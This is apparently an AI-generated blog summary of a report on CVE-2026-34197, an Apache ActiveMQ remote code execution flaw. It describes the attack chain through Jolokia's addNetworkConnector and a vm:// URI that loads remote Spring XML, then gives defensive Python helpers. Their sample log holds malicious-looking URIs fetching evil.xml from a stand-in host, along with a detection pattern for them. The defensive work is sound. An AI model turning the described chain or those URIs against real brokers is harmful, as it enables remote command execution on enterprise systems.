RC RANDOM CHAOS

AI-Assisted Research Surfaces 13-Year-Old RCE in Apache ActiveMQ Classic

Via BleepingComputer

Original source

13-year-old bug in ActiveMQ lets hackers remotely execute commands


A high-severity remote code execution flaw in Apache ActiveMQ Classic (CVE-2026-34197, CVSS 8.8) has been patched after sitting undetected for over a decade. Horizon3 researcher Naveen Sunkavally found it using Claude to trace how several individually innocuous features chain into an exploitable path: Jolokia's HTTP management API exposes the broker's JMX operations; one of those operations, addNetworkConnector, accepts an arbitrary transport URI; and a vm:// transport URI can carry a brokerConfig parameter that tells the embedded broker which Spring XML configuration to load. An attacker who can reach Jolokia therefore calls addNetworkConnector with a vm:// URI whose brokerConfig points at xbean:http://, the broker fetches attacker-controlled Spring XML from that remote server, and the beans it defines are instantiated when the configuration initializes, which yields arbitrary command execution.

In most affected versions the Jolokia endpoint requires authentication, so the attacker needs valid management credentials. ActiveMQ 6.0.0 through 6.1.1, however, are exploitable with no authentication at all, because a separate access control bug in those releases (CVE-2024-32114) leaves the Jolokia API open. Apache fixed CVE-2026-34197 in 5.19.4 and 6.2.3, eight days after receiving the report on March 22; since the bug has been present for roughly thirteen years, every earlier release on either branch should be treated as vulnerable.

The urgency is real: ActiveMQ Classic remains deeply embedded in enterprise Java stacks, and two prior ActiveMQ CVEs, an authenticated web console RCE from 2016 (CVE-2016-3088) and an unauthenticated broker RCE from 2023 (CVE-2023-46604), are already on CISA's Known Exploited Vulnerabilities list. Exploitation does leave traces: the broker logs the suspicious VM transport connection, including the brokerConfig=xbean:http:// parameter. That evidence is useful for scoping an incident after the fact rather than for prevention, because by the time the entry is written the remote configuration has already been loaded and the payload has run. The controls that matter are upgrading to a fixed release and, until then, keeping the Jolokia/JMX management endpoint off networks an attacker can reach.
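The following helpers, added here as an illustration and not taken from the BleepingComputer article, Horizon3 or the ActiveMQ project, turn the two practical points above into code: classifying a broker version against the fixed releases and the unauthenticated 6.0.0 to 6.1.1 window, and scanning broker logs for a vm:// transport URI whose brokerConfig pulls Spring XML from a remote xbean:http:// (or https/ftp) source. The sample log lines are constructed in the usual ActiveMQ log4j layout; only the brokerConfig=xbean:http:// marker comes from the article, the surrounding message text is assumed.

```python
"""Triage helpers for the CVE-2026-34197 exposure described above.

Added example, not code from the article, Horizon3 or the ActiveMQ
project. The sample log lines are constructed; only the
brokerConfig=xbean:http:// marker is taken from the article, the rest
of each message is assumed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Fixed releases named in the article, keyed by major version.
FIXED = {5: (5, 19, 4), 6: (6, 2, 3)}
# Releases where CVE-2024-32114 leaves the Jolokia API unauthenticated.
UNAUTH_LOW, UNAUTH_HIGH = (6, 0, 0), (6, 1, 1)
# Schemes that make the broker fetch its Spring XML over the network.
REMOTE_SCHEMES = {"http", "https", "ftp"}
# A vm: URI runs to the next whitespace, pipe or quote in a log line;
# the word boundary keeps "jvm:" from matching.
VM_URI_RE = re.compile(r"\bvm:[^\s|\"']+")


def parse_version(text):
    """'6.1.1' or '5.19.4-SNAPSHOT' -> (6, 1, 1) / (5, 19, 4)."""
    nums = [int(n) for n in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def triage_version(text):
    """Classify a broker version against the fixed releases above."""
    ver = parse_version(text)
    fixed = FIXED.get(ver[0])
    if fixed is None:
        return "unknown-branch"  # not a 5.x or 6.x release
    if ver >= fixed:
        return "patched"
    if UNAUTH_LOW <= ver <= UNAUTH_HIGH:
        return "vulnerable-unauthenticated"
    return "vulnerable-auth-required"


def is_remote_xbean_vm_uri(uri):
    """True for a vm:// transport URI whose brokerConfig loads Spring XML
    from a remote xbean: source, in plain or percent-encoded form."""
    try:
        parts = urlsplit(uri)
    except ValueError:
        return False
    if parts.scheme != "vm":
        return False
    # parse_qs percent-decodes, so xbean%3Ahttp%3A%2F%2F... is caught too.
    for value in parse_qs(parts.query).get("brokerConfig", []):
        if value.startswith("xbean:"):
            target = value[len("xbean:"):]
            if target.split(":", 1)[0].lower() in REMOTE_SCHEMES:
                return True
    return False


def scan_log(lines):
    """Return (line_no, uri) for each log line that records a vm://
    connection pulling its broker configuration from a remote server."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in VM_URI_RE.finditer(line):
            if is_remote_xbean_vm_uri(m.group(0)):
                hits.append((n, m.group(0)))
    return hits


# Constructed sample: lines 3 and 4 are the kind of entry the article
# describes (line 4 is percent-encoded, which a plain substring search
# for "brokerConfig=xbean:http://" would miss); line 5 is a legitimate
# local xbean config and must not be flagged.
SAMPLE_LOG = """\
2026-03-30 14:01:58,004 | INFO  | Apache ActiveMQ 6.1.1 (localhost, ID:broker-1) is starting | org.apache.activemq.broker.BrokerService | main
2026-03-30 14:02:11,532 | INFO  | Connector vm://localhost started | org.apache.activemq.broker.TransportConnector | main
2026-03-30 14:09:40,118 | INFO  | Network Connector NC:localhost->vm://localhost?brokerConfig=xbean:http://203.0.113.7/evil.xml started | org.apache.activemq.network.NetworkConnector | qtp-12
2026-03-30 14:09:40,120 | WARN  | Network Connector vm://localhost?brokerConfig=xbean%3Ahttps%3A%2F%2F203.0.113.7%2Fevil.xml failed | org.apache.activemq.network.NetworkConnector | qtp-13
2026-03-30 14:10:02,777 | INFO  | Connector vm://localhost?brokerConfig=xbean:activemq.xml started | org.apache.activemq.broker.TransportConnector | main
"""

if __name__ == "__main__":
    print("6.1.1 ->", triage_version("6.1.1"))
    for n, uri in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {n}: remote broker config pulled via {uri}")
```

The version check tells you whether a given broker can be hit without credentials; the log scan is strictly retrospective, as the article notes, so a hit means the remote Spring XML was already loaded and the host should be handled as compromised rather than merely exposed. The URI is parsed rather than string-matched so that an encoded brokerConfig value does not slip past the check.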


This is an AI-generated summary. Read the original for the full story.